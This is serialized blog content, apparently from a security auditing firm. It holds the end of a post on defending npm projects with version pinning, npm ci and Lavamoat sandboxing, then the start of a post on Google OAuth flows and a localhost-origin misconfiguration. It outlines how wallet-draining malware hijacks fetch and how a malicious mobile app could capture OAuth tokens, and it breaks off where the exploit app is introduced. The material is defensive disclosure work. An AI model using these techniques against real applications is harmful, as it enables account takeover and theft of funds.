"type":31,"value":19288},{"type":25,"tag":216,"props":103012,"children":103013},{"style":8205},[103014],{"type":31,"value":103015},"\"8.3.0\"",{"type":25,"tag":216,"props":103017,"children":103018},{"style":6964},[103019],{"type":31,"value":7465},{"type":25,"tag":216,"props":103021,"children":103022},{"class":6922,"line":6778},[103023,103028,103032,103037],{"type":25,"tag":216,"props":103024,"children":103025},{"style":8205},[103026],{"type":31,"value":103027},"\"@react-native-community/netinfo\"",{"type":25,"tag":216,"props":103029,"children":103030},{"style":6964},[103031],{"type":31,"value":19288},{"type":25,"tag":216,"props":103033,"children":103034},{"style":8205},[103035],{"type":31,"value":103036},"\"11.4.1\"",{"type":25,"tag":216,"props":103038,"children":103039},{"style":6964},[103040],{"type":31,"value":7465},{"type":25,"tag":216,"props":103042,"children":103043},{"class":6922,"line":7005},[103044,103049,103053],{"type":25,"tag":216,"props":103045,"children":103046},{"style":8205},[103047],{"type":31,"value":103048},"\"@react-native-picker/picker\"",{"type":25,"tag":216,"props":103050,"children":103051},{"style":6964},[103052],{"type":31,"value":19288},{"type":25,"tag":216,"props":103054,"children":103055},{"style":8205},[103056],{"type":31,"value":103057},"\"2.11.0\"\n",{"type":25,"tag":606,"props":103059,"children":103061},{"id":103060},"_2-use-npm-ci",[103062,103064],{"type":31,"value":103063},"2. Use ",{"type":25,"tag":82,"props":103065,"children":103067},{"className":103066},[],[103068],{"type":31,"value":103069},"npm ci",{"type":25,"tag":38,"props":103071,"children":103072},{},[103073,103078,103080,103086,103088,103093],{"type":25,"tag":82,"props":103074,"children":103076},{"className":103075},[],[103077],{"type":31,"value":103069},{"type":31,"value":103079}," uses the dependency versions from ",{"type":25,"tag":82,"props":103081,"children":103083},{"className":103082},[],[103084],{"type":31,"value":103085},"package-lock.json",{"type":31,"value":103087}," to install the packages. Consider using it in CI/CD workflows and only use ",{"type":25,"tag":82,"props":103089,"children":103091},{"className":103090},[],[103092],{"type":31,"value":102955},{"type":31,"value":103094}," when adding a new package or updating an existing one.",{"type":25,"tag":606,"props":103096,"children":103098},{"id":103097},"_3-implement-lavamoat",[103099,103101],{"type":31,"value":103100},"3. Implement ",{"type":25,"tag":162,"props":103102,"children":103105},{"href":103103,"rel":103104},"https://github.com/LavaMoat/LavaMoat/tree/main",[166],[103106],{"type":25,"tag":9273,"props":103107,"children":103108},{},[103109],{"type":31,"value":103110},"Lavamoat",{"type":25,"tag":38,"props":103112,"children":103113},{},[103114],{"type":31,"value":103115},"Basic hygiene helps, but it doesn’t solve the root issue: a minor utility package has the same permissions as your code. Lavamoat changes this model. Lavamoat, created by MetaMask, addresses this by sandboxing packages and enforcing least privilege. With it, even if a dependency contains malware, it cannot compromise the application.",{"type":25,"tag":38,"props":103117,"children":103118},{},[103119],{"type":31,"value":103120},"Lavamoat uses SES (Hardened JavaScript) to enforce these restrictions, limiting the globals, functions, and sub-dependencies each package can access. The rules are defined in a policy file, which looks like this:",{"type":25,"tag":206,"props":103122,"children":103124},{"code":103123,"language":37960,"meta":7,"className":37958,"style":7},"\"resources\": {\n    \"@ethereumjs/util>@ethereumjs/rlp\": {\n      \"globals\": {\n        \"TextEncoder\": true\n      }\n    },\n    \"@ethereumjs/util\": {\n      \"globals\": {\n        \"console.warn\": true,\n        \"fetch\": true\n      },\n      \"packages\": {\n        \"@ethereumjs/util>@ethereumjs/rlp\": true,\n        \"@ethereumjs/util>ethereum-cryptography\": true\n      }\n    }\n}\n",[103125],{"type":25,"tag":82,"props":103126,"children":103127},{"__ignoreMap":7},[103128,103140,103152,103163,103179,103186,103193,103205,103216,103236,103252,103259,103270,103290,103306,103313,103320],{"type":25,"tag":216,"props":103129,"children":103130},{"class":6922,"line":6923},[103131,103136],{"type":25,"tag":216,"props":103132,"children":103133},{"style":8205},[103134],{"type":31,"value":103135},"\"resources\"",{"type":25,"tag":216,"props":103137,"children":103138},{"style":6964},[103139],{"type":31,"value":40985},{"type":25,"tag":216,"props":103141,"children":103142},{"class":6922,"line":6769},[103143,103148],{"type":25,"tag":216,"props":103144,"children":103145},{"style":6947},[103146],{"type":31,"value":103147},"    \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":25,"tag":216,"props":103149,"children":103150},{"style":6964},[103151],{"type":31,"value":40985},{"type":25,"tag":216,"props":103153,"children":103154},{"class":6922,"line":6778},[103155,103159],{"type":25,"tag":216,"props":103156,"children":103157},{"style":6947},[103158],{"type":31,"value":40993},{"type":25,"tag":216,"props":103160,"children":103161},{"style":6964},[103162],{"type":31,"value":40985},{"type":25,"tag":216,"props":103164,"children":103165},{"class":6922,"line":7005},[103166,103171,103175],{"type":25,"tag":216,"props":103167,"children":103168},{"style":6947},[103169],{"type":31,"value":103170},"        \"TextEncoder\"",{"type":25,"tag":216,"props":103172,"children":103173},{"style":6964},[103174],{"type":31,"value":19288},{"type":25,"tag":216,"props":103176,"children":103177},{"style":6936},[103178],{"type":31,"value":41154},{"type":25,"tag":216,"props":103180,"children":103181},{"class":6922,"line":7110},[103182],{"type":25,"tag":216,"props":103183,"children":103184},{"style":6964},[103185],{"type":31,"value":16620},{"type":25,"tag":216,"props":103187,"children":103188},{"class":6922,"line":7216},[103189],{"type":25,"tag":216,"props":103190,"children":103191},{"style":6964},[103192],{"type":31,"value":29339},{"type":25,"tag":216,"props":103194,"children":103195},{"class":6922,"line":7244},[103196,103201],{"type":25,"tag":216,"props":103197,"children":103198},{"style":6947},[103199],{"type":31,"value":103200},"    \"@ethereumjs/util\"",{"type":25,"tag":216,"props":103202,"children":103203},{"style":6964},[103204],{"type":31,"value":40985},{"type":25,"tag":216,"props":103206,"children":103207},{"class":6922,"line":7257},[103208,103212],{"type":25,"tag":216,"props":103209,"children":103210},{"style":6947},[103211],{"type":31,"value":40993},{"type":25,"tag":216,"props":103213,"children":103214},{"style":6964},[103215],{"type":31,"value":40985},{"type":25,"tag":216,"props":103217,"children":103218},{"class":6922,"line":7275},[103219,103224,103228,103232],{"type":25,"tag":216,"props":103220,"children":103221},{"style":6947},[103222],{"type":31,"value":103223},"        \"console.warn\"",{"type":25,"tag":216,"props":103225,"children":103226},{"style":6964},[103227],{"type":31,"value":19288},{"type":25,"tag":216,"props":103229,"children":103230},{"style":6936},[103231],{"type":31,"value":230},{"type":25,"tag":216,"props":103233,"children":103234},{"style":6964},[103235],{"type":31,"value":7465},{"type":25,"tag":216,"props":103237,"children":103238},{"class":6922,"line":7296},[103239,103244,103248],{"type":25,"tag":216,"props":103240,"children":103241},{"style":6947},[103242],{"type":31,"value":103243},"        \"fetch\"",{"type":25,"tag":216,"props":103245,"children":103246},{"style":6964},[103247],{"type":31,"value":19288},{"type":25,"tag":216,"props":103249,"children":103250},{"style":6936},[103251],{"type":31,"value":41154},{"type":25,"tag":216,"props":103253,"children":103254},{"class":6922,"line":7305},[103255],{"type":25,"tag":216,"props":103256,"children":103257},{"style":6964},[103258],{"type":31,"value":41162},{"type":25,"tag":216,"props":103260,"children":103261},{"class":6922,"line":7557},[103262,103266],{"type":25,"tag":216,"props":103263,"children":103264},{"style":6947},[103265],{"type":31,"value":41170},{"type":25,"tag":216,"props":103267,"children":103268},{"style":6964},[103269],{"type":31,"value":40985},{"type":25,"tag":216,"props":103271,"children":103272},{"class":6922,"line":7574},[103273,103278,103282,103286],{"type":25,"tag":216,"props":103274,"children":103275},{"style":6947},[103276],{"type":31,"value":103277},"        \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":25,"tag":216,"props":103279,"children":103280},{"style":6964},[103281],{"type":31,"value":19288},{"type":25,"tag":216,"props":103283,"children":103284},{"style":6936},[103285],{"type":31,"value":230},{"type":25,"tag":216,"props":103287,"children":103288},{"style":6964},[103289],{"type":31,"value":7465},{"type":25,"tag":216,"props":103291,"children":103292},{"class":6922,"line":7591},[103293,103298,103302],{"type":25,"tag":216,"props":103294,"children":103295},{"style":6947},[103296],{"type":31,"value":103297},"        \"@ethereumjs/util>ethereum-cryptography\"",{"type":25,"tag":216,"props":103299,"children":103300},{"style":6964},[103301],{"type":31,"value":19288},{"type":25,"tag":216,"props":103303,"children":103304},{"style":6936},[103305],{"type":31,"value":41154},{"type":25,"tag":216,"props":103307,"children":103308},{"class":6922,"line":7604},[103309],{"type":25,"tag":216,"props":103310,"children":103311},{"style":6964},[103312],{"type":31,"value":16620},{"type":25,"tag":216,"props":103314,"children":103315},{"class":6922,"line":7613},[103316],{"type":25,"tag":216,"props":103317,"children":103318},{"style":6964},[103319],{"type":31,"value":7311},{"type":25,"tag":216,"props":103321,"children":103322},{"class":6922,"line":7636},[103323],{"type":25,"tag":216,"props":103324,"children":103325},{"style":6964},[103326],{"type":31,"value":7874},{"type":25,"tag":38,"props":103328,"children":103329},{},[103330,103332,103338,103340,103346,103347,103352,103354,103360,103361,103367],{"type":31,"value":103331},"In this example, it restricts the ",{"type":25,"tag":82,"props":103333,"children":103335},{"className":103334},[],[103336],{"type":31,"value":103337},"@ethereumjs/util",{"type":31,"value":103339}," package to use only ",{"type":25,"tag":82,"props":103341,"children":103343},{"className":103342},[],[103344],{"type":31,"value":103345},"console.warn",{"type":31,"value":1307},{"type":25,"tag":82,"props":103348,"children":103350},{"className":103349},[],[103351],{"type":31,"value":38057},{"type":31,"value":103353}," functions, and to include only ",{"type":25,"tag":82,"props":103355,"children":103357},{"className":103356},[],[103358],{"type":31,"value":103359},"@ethereumjs/rlp",{"type":31,"value":1307},{"type":25,"tag":82,"props":103362,"children":103364},{"className":103363},[],[103365],{"type":31,"value":103366},"ethereum-cryptography",{"type":31,"value":103368}," packages.",{"type":25,"tag":38,"props":103370,"children":103371},{},[103372],{"type":31,"value":103373},"The policy files can be generated automatically and should be regenerated carefully, because if you generate a policy while a malicious package is installed, Lavamoat’s protection can be bypassed.",{"type":25,"tag":38,"props":103375,"children":103376},{},[103377,103379,103385],{"type":31,"value":103378},"Lavamoat also automatically freezes the global objects to prevent them being replaced or tampered with. See ",{"type":25,"tag":162,"props":103380,"children":103383},{"href":103381,"rel":103382},"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze",[166],[103384],{"type":31,"value":41340},{"type":31,"value":179},{"type":25,"tag":606,"props":103387,"children":103389},{"id":103388},"lavamoat-vs-qix-malware",[103390],{"type":31,"value":103391},"Lavamoat vs Qix Malware",{"type":25,"tag":38,"props":103393,"children":103394},{},[103395,103397,103402],{"type":31,"value":103396},"If a dApp were compromised with the Qix malware (say it used ",{"type":25,"tag":82,"props":103398,"children":103400},{"className":103399},[],[103401],{"type":31,"value":101242},{"type":31,"value":103403},"), it would need to perform the following actions to drain funds from a wallet:",{"type":25,"tag":6711,"props":103405,"children":103406},{},[103407,103419,103430,103441],{"type":25,"tag":2043,"props":103408,"children":103409},{},[103410,103412,103417],{"type":31,"value":103411},"Replace ",{"type":25,"tag":82,"props":103413,"children":103415},{"className":103414},[],[103416],{"type":31,"value":38057},{"type":31,"value":103418}," function to a custom one",{"type":25,"tag":2043,"props":103420,"children":103421},{},[103422,103424],{"type":31,"value":103423},"Access ",{"type":25,"tag":82,"props":103425,"children":103427},{"className":103426},[],[103428],{"type":31,"value":103429},"window.ethereum",{"type":25,"tag":2043,"props":103431,"children":103432},{},[103433,103435,103440],{"type":31,"value":103434},"Call original ",{"type":25,"tag":82,"props":103436,"children":103438},{"className":103437},[],[103439],{"type":31,"value":38057},{"type":31,"value":42177},{"type":25,"tag":2043,"props":103442,"children":103443},{},[103444],{"type":31,"value":103445},"Plus other actions not relevant here",{"type":25,"tag":38,"props":103447,"children":103448},{},[103449,103451,103457],{"type":31,"value":103450},"If the dApp is using Lavamoat with a generated policy for ",{"type":25,"tag":82,"props":103452,"children":103454},{"className":103453},[],[103455],{"type":31,"value":103456},"chalk 5.6.0",{"type":31,"value":103458}," (non-malicious version) it would look like this:",{"type":25,"tag":206,"props":103460,"children":103462},{"code":103461,"language":37960,"meta":7,"className":37958,"style":7},"\"chalk\": {\n      \"globals\": {\n        \"navigator.userAgent\": true,\n        \"navigator.userAgentData\": true\n      }\n    },\n",[103463],{"type":25,"tag":82,"props":103464,"children":103465},{"__ignoreMap":7},[103466,103478,103489,103509,103525,103532],{"type":25,"tag":216,"props":103467,"children":103468},{"class":6922,"line":6923},[103469,103474],{"type":25,"tag":216,"props":103470,"children":103471},{"style":8205},[103472],{"type":31,"value":103473},"\"chalk\"",{"type":25,"tag":216,"props":103475,"children":103476},{"style":6964},[103477],{"type":31,"value":40985},{"type":25,"tag":216,"props":103479,"children":103480},{"class":6922,"line":6769},[103481,103485],{"type":25,"tag":216,"props":103482,"children":103483},{"style":6947},[103484],{"type":31,"value":40993},{"type":25,"tag":216,"props":103486,"children":103487},{"style":6964},[103488],{"type":31,"value":40985},{"type":25,"tag":216,"props":103490,"children":103491},{"class":6922,"line":6778},[103492,103497,103501,103505],{"type":25,"tag":216,"props":103493,"children":103494},{"style":6947},[103495],{"type":31,"value":103496},"        \"navigator.userAgent\"",{"type":25,"tag":216,"props":103498,"children":103499},{"style":6964},[103500],{"type":31,"value":19288},{"type":25,"tag":216,"props":103502,"children":103503},{"style":6936},[103504],{"type":31,"value":230},{"type":25,"tag":216,"props":103506,"children":103507},{"style":6964},[103508],{"type":31,"value":7465},{"type":25,"tag":216,"props":103510,"children":103511},{"class":6922,"line":7005},[103512,103517,103521],{"type":25,"tag":216,"props":103513,"children":103514},{"style":6947},[103515],{"type":31,"value":103516},"        \"navigator.userAgentData\"",{"type":25,"tag":216,"props":103518,"children":103519},{"style":6964},[103520],{"type":31,"value":19288},{"type":25,"tag":216,"props":103522,"children":103523},{"style":6936},[103524],{"type":31,"value":41154},{"type":25,"tag":216,"props":103526,"children":103527},{"class":6922,"line":7110},[103528],{"type":25,"tag":216,"props":103529,"children":103530},{"style":6964},[103531],{"type":31,"value":16620},{"type":25,"tag":216,"props":103533,"children":103534},{"class":6922,"line":7216},[103535],{"type":25,"tag":216,"props":103536,"children":103537},{"style":6964},[103538],{"type":31,"value":29339},{"type":25,"tag":38,"props":103540,"children":103541},{},[103542,103544,103550],{"type":31,"value":103543},"That means that the chalk dependency can only access these two global attributes from ",{"type":25,"tag":82,"props":103545,"children":103547},{"className":103546},[],[103548],{"type":31,"value":103549},"navigator",{"type":31,"value":179},{"type":25,"tag":38,"props":103552,"children":103553},{},[103554,103556,103562],{"type":31,"value":103555},"When the compromised dApp would execute the malicious payload of ",{"type":25,"tag":82,"props":103557,"children":103559},{"className":103558},[],[103560],{"type":31,"value":103561},"chalk v5.6.1",{"type":31,"value":103563}," it would fail due to insufficient permissions:",{"type":25,"tag":38,"props":103565,"children":103566},{},[103567],{"type":25,"tag":6467,"props":103568,"children":103570},{"alt":54547,"src":103569},"/posts/supply-chain-attcks/error.png",[],{"type":25,"tag":38,"props":103572,"children":103573},{},[103574,103576,103581],{"type":31,"value":103575},"This error shows that the malware failed since it cannot redefine ",{"type":25,"tag":82,"props":103577,"children":103579},{"className":103578},[],[103580],{"type":31,"value":38057},{"type":31,"value":29426},{"type":25,"tag":206,"props":103583,"children":103585},{"code":103584},"TypeError#1: Cannot define property fetch, object is not extensible\n",[103586],{"type":25,"tag":82,"props":103587,"children":103588},{"__ignoreMap":7},[103589],{"type":31,"value":103584},{"type":25,"tag":26,"props":103591,"children":103593},{"id":103592},"lavamoat-in-practice",[103594],{"type":31,"value":103595},"Lavamoat In Practice",{"type":25,"tag":38,"props":103597,"children":103598},{},[103599,103601,103608],{"type":31,"value":103600},"The OtterSec team audited the Lavamoat Webpack Plugin in late 2024 and identified vulnerabilities that attackers could abuse to bypass Lavamoat protections (",{"type":25,"tag":162,"props":103602,"children":103605},{"href":103603,"rel":103604},"https://osec.io/reports/lavamoat_audit_final.pdf",[166],[103606],{"type":31,"value":103607},"see the audit report",{"type":31,"value":24702},{"type":25,"tag":38,"props":103610,"children":103611},{},[103612],{"type":31,"value":103613},"Like any security tool, it isn’t flawless, but it represents an important shift: it minimizes what malicious code can do, rather than assuming every dependency deserves full trust. Supply-chain attacks are designed to hit as many victims as possible, not to target individual organizations. By implementing Lavamoat, you dramatically reduce your exposure and force attackers to look elsewhere.",{"type":25,"tag":26,"props":103615,"children":103616},{"id":79769},[103617],{"type":31,"value":79772},{"type":25,"tag":38,"props":103619,"children":103620},{},[103621],{"type":31,"value":103622},"The NPM incident may not have caused massive losses, but it was a clear proof-of-concept for how fragile the current model is. Supply-chain attacks will happen again, and relying on registry security alone is not enough.",{"type":25,"tag":38,"props":103624,"children":103625},{},[103626,103628,103633],{"type":31,"value":103627},"Version pinning and ",{"type":25,"tag":82,"props":103629,"children":103631},{"className":103630},[],[103632],{"type":31,"value":103069},{"type":31,"value":103634}," provide a baseline defense, but Lavamoat represents the next step: enforcing least privilege for dependencies. If you’re building critical applications, adopting and contributing to Lavamoat is one of the most effective ways to stay ahead.",{"type":25,"tag":9316,"props":103636,"children":103637},{},[103638],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":103640},[103641,103644,103645,103654,103655],{"id":101257,"depth":6769,"text":101260,"children":103642},[103643],{"id":102892,"depth":6778,"text":102895},{"id":102903,"depth":6769,"text":102906},{"id":102919,"depth":6769,"text":102922,"children":103646},[103647,103649,103651,103653],{"id":102930,"depth":6778,"text":103648},"1. Version pinning in package.json",{"id":103060,"depth":6778,"text":103650},"2. Use npm ci",{"id":103097,"depth":6778,"text":103652},"3. Implement Lavamoat",{"id":103388,"depth":6778,"text":103391},{"id":103592,"depth":6769,"text":103595},{"id":79769,"depth":6769,"text":79772},"content:blog:2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks",{"_path":103660,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":103661,"description":103662,"date":103663,"author":103664,"image":103665,"isFeatured":16,"onBlogPage":16,"tags":103667,"body":103670,"_type":6798,"_id":106001,"_source":6800,"_file":106002,"_stem":106003,"_extension":6803},"/blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations","How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs","OAuth misconfigurations show how common dev settings can lead to account takeovers. Explore real cases where failing to account for differences between desktop and mobile environments left SDKs, exchanges, and wallets vulnerable to exploits.","2025-10-16T12:00:00.000Z",[35163,35162],{"src":103666,"width":101226,"height":17580},"/posts/oauth-misconfigurations/title.png",[103668,103669],"oAuth","exchanges",{"type":22,"children":103671,"toc":105988},[103672,103678,103683,103689,103709,103715,103720,103733,103738,103746,103760,103769,103778,103792,103800,103811,103871,103877,103889,103938,103944,103949,103962,103969,103980,104000,104019,104040,104046,104059,104064,104070,104089,104714,104719,104732,105593,105598,105603,105609,105614,105620,105625,105638,105678,105684,105697,105702,105735,105740,105745,105770,105775,105787,105944,105949,105953,105965,105970,105974,105979,105984],{"type":25,"tag":26,"props":103673,"children":103675},{"id":103674},"exploiting-oauth",[103676],{"type":31,"value":103677},"Exploiting OAuth",{"type":25,"tag":38,"props":103679,"children":103680},{},[103681],{"type":31,"value":103682},"Our main research focus was related to recent vulnerabilities we found in some of our audits. One common issue we find is related to OAuth misconfigurations that can be exploited to achieve account takeover. To understand the vulnerability and the exploit itself, we first need to dig into the different OAuth flows and the configurations that can be made in the Google Cloud Console.",{"type":25,"tag":606,"props":103684,"children":103686},{"id":103685},"google-authentication-flows",[103687],{"type":31,"value":103688},"Google Authentication Flows",{"type":25,"tag":38,"props":103690,"children":103691},{},[103692,103694,103700,103702,103707],{"type":31,"value":103693},"During our research, we identified various Google Authentication flows that require different exploitation methods. The new/most recent flow is called GSI, which mainly uses ",{"type":25,"tag":82,"props":103695,"children":103697},{"className":103696},[],[103698],{"type":31,"value":103699},"postMessage",{"type":31,"value":103701}," for communication with the Relying Party (RP), and the old one mostly uses ",{"type":25,"tag":82,"props":103703,"children":103705},{"className":103704},[],[103706],{"type":31,"value":73735},{"type":31,"value":103708}," to send the token back to the RP.",{"type":25,"tag":630,"props":103710,"children":103712},{"id":103711},"gsi-new-flow",[103713],{"type":31,"value":103714},"GSI (New Flow)",{"type":25,"tag":38,"props":103716,"children":103717},{},[103718],{"type":31,"value":103719},"The GSI flow also has two ways to authenticate the user to the RP:",{"type":25,"tag":2039,"props":103721,"children":103722},{},[103723,103728],{"type":25,"tag":2043,"props":103724,"children":103725},{},[103726],{"type":31,"value":103727},"Using FedCM API",{"type":25,"tag":2043,"props":103729,"children":103730},{},[103731],{"type":31,"value":103732},"Without using FedCM API",{"type":25,"tag":38,"props":103734,"children":103735},{},[103736],{"type":31,"value":103737},"FedCM (Federated Credentials Manager) is a new browser API that lets users authenticate natively to an RP using a third-party IdP.",{"type":25,"tag":38,"props":103739,"children":103740},{},[103741],{"type":25,"tag":9273,"props":103742,"children":103743},{},[103744],{"type":31,"value":103745},"FedCM Method",{"type":25,"tag":38,"props":103747,"children":103748},{},[103749,103751,103758],{"type":31,"value":103750},"The FedCM method basically follows this ",{"type":25,"tag":162,"props":103752,"children":103755},{"href":103753,"rel":103754},"https://privacysandbox.google.com/cookies/fedcm/why#user-interaction",[166],[103756],{"type":31,"value":103757},"user experience",{"type":31,"value":103759},". Users can log in by clicking a login button (which will open a \"choose your account\" prompt window) or by 1-tap UX (see images below).",{"type":25,"tag":38,"props":103761,"children":103762},{},[103763,103765],{"type":31,"value":103764},"The normal flow, clicking the \"sign in\" button:\n",{"type":25,"tag":6467,"props":103766,"children":103768},{"alt":54547,"src":103767},"/posts/oauth-misconfigurations/image1.png",[],{"type":25,"tag":38,"props":103770,"children":103771},{},[103772,103774],{"type":31,"value":103773},"One-Tap popup shown when you open the page:\n",{"type":25,"tag":6467,"props":103775,"children":103777},{"alt":54547,"src":103776},"/posts/oauth-misconfigurations/image2.png",[],{"type":25,"tag":38,"props":103779,"children":103780},{},[103781,103783,103790],{"type":31,"value":103782},"Both flows use FedCM API to authenticate using Google IdP service, which makes some CORS requests to the IdP server to return the token. After authenticating the first time, when the user returns to the same website after some time, it is possible to automatically reauthenticate using ",{"type":25,"tag":162,"props":103784,"children":103787},{"href":103785,"rel":103786},"https://github.com/w3c-fedid/FedCM/issues/429",[166],[103788],{"type":31,"value":103789},"FedCM auto-reauthentication",{"type":31,"value":103791},", which has certain preconditions that must be met.",{"type":25,"tag":38,"props":103793,"children":103794},{},[103795],{"type":25,"tag":9273,"props":103796,"children":103797},{},[103798],{"type":31,"value":103799},"Non-FedCM Method",{"type":25,"tag":38,"props":103801,"children":103802},{},[103803,103805,103810],{"type":31,"value":103804},"This method uses a popup window (or iframe) to open the Google OAuth consent page and return the token via ",{"type":25,"tag":82,"props":103806,"children":103808},{"className":103807},[],[103809],{"type":31,"value":103699},{"type":31,"value":1472},{"type":25,"tag":6711,"props":103812,"children":103813},{},[103814,103819,103843,103848,103859],{"type":25,"tag":2043,"props":103815,"children":103816},{},[103817],{"type":31,"value":103818},"The user clicks the sign in button",{"type":25,"tag":2043,"props":103820,"children":103821},{},[103822,103824,103830,103832,103837,103838],{"type":31,"value":103823},"RP opens a popup/iframe to ",{"type":25,"tag":162,"props":103825,"children":103828},{"href":103826,"rel":103827},"https://accounts.google.com/o/oauth2/v2/auth",[166],[103829],{"type":31,"value":103826},{"type":31,"value":103831}," with some important parameters like ",{"type":25,"tag":82,"props":103833,"children":103835},{"className":103834},[],[103836],{"type":31,"value":73567},{"type":31,"value":1307},{"type":25,"tag":82,"props":103839,"children":103841},{"className":103840},[],[103842],{"type":31,"value":44099},{"type":25,"tag":2043,"props":103844,"children":103845},{},[103846],{"type":31,"value":103847},"The user clicks the \"Continue\" button to authorize authentication",{"type":25,"tag":2043,"props":103849,"children":103850},{},[103851,103853],{"type":31,"value":103852},"They get redirected to ",{"type":25,"tag":162,"props":103854,"children":103857},{"href":103855,"rel":103856},"https://accounts.google.com/gsi/transform",[166],[103858],{"type":31,"value":103855},{"type":25,"tag":2043,"props":103860,"children":103861},{},[103862,103864,103869],{"type":31,"value":103863},"/gsi/transform sends the token back to the RP via ",{"type":25,"tag":82,"props":103865,"children":103867},{"className":103866},[],[103868],{"type":31,"value":103699},{"type":31,"value":103870}," (after some SYN/ACK messages)",{"type":25,"tag":630,"props":103872,"children":103874},{"id":103873},"oauth-20-old-flow",[103875],{"type":31,"value":103876},"OAuth 2.0 Old Flow",{"type":25,"tag":38,"props":103878,"children":103879},{},[103880,103882,103887],{"type":31,"value":103881},"The old flow also redirects the user to the Google OAuth consent page and then returns the token via a ",{"type":25,"tag":82,"props":103883,"children":103885},{"className":103884},[],[103886],{"type":31,"value":73735},{"type":31,"value":103888}," provided in the URL and validated by a whitelist configuration:",{"type":25,"tag":6711,"props":103890,"children":103891},{},[103892,103896,103917,103921],{"type":25,"tag":2043,"props":103893,"children":103894},{},[103895],{"type":31,"value":103818},{"type":25,"tag":2043,"props":103897,"children":103898},{},[103899,103900,103905,103906,103911,103912],{"type":31,"value":103823},{"type":25,"tag":162,"props":103901,"children":103903},{"href":103826,"rel":103902},[166],[103904],{"type":31,"value":103826},{"type":31,"value":103831},{"type":25,"tag":82,"props":103907,"children":103909},{"className":103908},[],[103910],{"type":31,"value":73567},{"type":31,"value":1307},{"type":25,"tag":82,"props":103913,"children":103915},{"className":103914},[],[103916],{"type":31,"value":73735},{"type":25,"tag":2043,"props":103918,"children":103919},{},[103920],{"type":31,"value":103847},{"type":25,"tag":2043,"props":103922,"children":103923},{},[103924,103925,103930,103932],{"type":31,"value":103852},{"type":25,"tag":82,"props":103926,"children":103928},{"className":103927},[],[103929],{"type":31,"value":73735},{"type":31,"value":103931}," with the token in the query parameters or ",{"type":25,"tag":82,"props":103933,"children":103935},{"className":103934},[],[103936],{"type":31,"value":103937},"location.hash",{"type":25,"tag":630,"props":103939,"children":103941},{"id":103940},"different-configurations",[103942],{"type":31,"value":103943},"Different Configurations",{"type":25,"tag":38,"props":103945,"children":103946},{},[103947],{"type":31,"value":103948},"These two flows must be configured differently in the Google Cloud Console. There are two whitelist configurations that we can control:",{"type":25,"tag":2039,"props":103950,"children":103951},{},[103952,103957],{"type":25,"tag":2043,"props":103953,"children":103954},{},[103955],{"type":31,"value":103956},"Authorized origins",{"type":25,"tag":2043,"props":103958,"children":103959},{},[103960],{"type":31,"value":103961},"Authorized redirect URIs",{"type":25,"tag":38,"props":103963,"children":103964},{},[103965],{"type":25,"tag":6467,"props":103966,"children":103968},{"alt":54547,"src":103967},"/posts/oauth-misconfigurations/image3.png",[],{"type":25,"tag":38,"props":103970,"children":103971},{},[103972,103974,103979],{"type":31,"value":103973},"The described GSI flow doesn't use any redirection to send the token back to the RP, so the authorized redirect URI is not that important in the GSI flow. It uses the authorized origins to verify if the RP page is actually allowed to be authenticated using that ",{"type":25,"tag":82,"props":103975,"children":103977},{"className":103976},[],[103978],{"type":31,"value":73567},{"type":31,"value":179},{"type":25,"tag":38,"props":103981,"children":103982},{},[103983,103985,103991,103993,103998],{"type":31,"value":103984},"The actual verification in the GSI flow happens in the CORS requests made by FedCM or in ",{"type":25,"tag":82,"props":103986,"children":103988},{"className":103987},[],[103989],{"type":31,"value":103990},"/oauth2/v2/auth",{"type":31,"value":103992}," by checking the ",{"type":25,"tag":82,"props":103994,"children":103996},{"className":103995},[],[103997],{"type":31,"value":44099},{"type":31,"value":103999}," query parameter.",{"type":25,"tag":38,"props":104001,"children":104002},{},[104003,104005,104010,104012,104017],{"type":31,"value":104004},"In the old flow, the ",{"type":25,"tag":82,"props":104006,"children":104008},{"className":104007},[],[104009],{"type":31,"value":73735},{"type":31,"value":104011}," parameter passed in the ",{"type":25,"tag":82,"props":104013,"children":104015},{"className":104014},[],[104016],{"type":31,"value":103990},{"type":31,"value":104018}," endpoint is validated against the authorized redirect URIs.",{"type":25,"tag":38,"props":104020,"children":104021},{},[104022,104024,104029,104031,104038],{"type":31,"value":104023},"Note that the new GSI flow can also have a different flow using ",{"type":25,"tag":82,"props":104025,"children":104027},{"className":104026},[],[104028],{"type":31,"value":73735},{"type":31,"value":104030}," validation. To execute this flow, you need to specify ",{"type":25,"tag":162,"props":104032,"children":104035},{"href":104033,"rel":104034},"https://developers.google.com/identity/gsi/web/reference/js-reference#login_uri",[166],[104036],{"type":31,"value":104037},"login_uri",{"type":31,"value":104039}," while using the SDK.",{"type":25,"tag":606,"props":104041,"children":104043},{"id":104042},"localhost-exploit",[104044],{"type":31,"value":104045},"Localhost Exploit",{"type":25,"tag":38,"props":104047,"children":104048},{},[104049,104051,104057],{"type":31,"value":104050},"During one of our audits, we found a bug related to how developers test the OAuth flow in their development environment. Developers often whitelist the ",{"type":25,"tag":82,"props":104052,"children":104054},{"className":104053},[],[104055],{"type":31,"value":104056},"localhost",{"type":31,"value":104058}," origin because it is considered trusted for local testing.",{"type":25,"tag":38,"props":104060,"children":104061},{},[104062],{"type":31,"value":104063},"Actually, this is partially true, as it depends on which security assumptions you make. This can be an issue in a mobile environment, as mobile apps can open localhost webservers without many permissions, and having a malicious app installed is not considered a significant issue on mobile since all applications are sandboxed. This configuration allows a malicious application to \"escape\" the sandbox and attack another system.",{"type":25,"tag":630,"props":104065,"children":104067},{"id":104066},"exploit",[104068],{"type":31,"value":104069},"Exploit",{"type":25,"tag":38,"props":104071,"children":104072},{},[104073,104075,104080,104081,104087],{"type":31,"value":104074},"To exploit this misconfiguration, we first needed to understand the OAuth flow used by the target. If the OAuth implementation follows a standard flow without using Google Sign-In (GSI), we can extract the token via ",{"type":25,"tag":82,"props":104076,"children":104078},{"className":104077},[],[104079],{"type":31,"value":103937},{"type":31,"value":17090},{"type":25,"tag":82,"props":104082,"children":104084},{"className":104083},[],[104085],{"type":31,"value":104086},"location.search",{"type":31,"value":104088},". To achieve this, we developed a Kotlin application that spins up a local web 